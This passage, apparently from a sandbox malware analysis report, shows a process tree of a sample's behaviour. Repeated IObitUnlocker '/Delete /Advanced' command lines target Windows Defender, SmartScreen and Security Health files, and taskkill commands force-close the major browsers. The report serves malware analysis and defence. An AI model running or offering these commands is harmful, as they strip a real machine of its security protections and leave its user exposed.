                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:12016
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:12040
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:12304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:12556
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:12808
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:13064
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:10732
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10126960101\bc38aac1b9.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10126960101\bc38aac1b9.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2160
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          taskkill /F /IM firefox.exe /T
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4700
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          taskkill /F /IM chrome.exe /T
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:548
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          taskkill /F /IM msedge.exe /T
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2792
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          taskkill /F /IM opera.exe /T
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2948
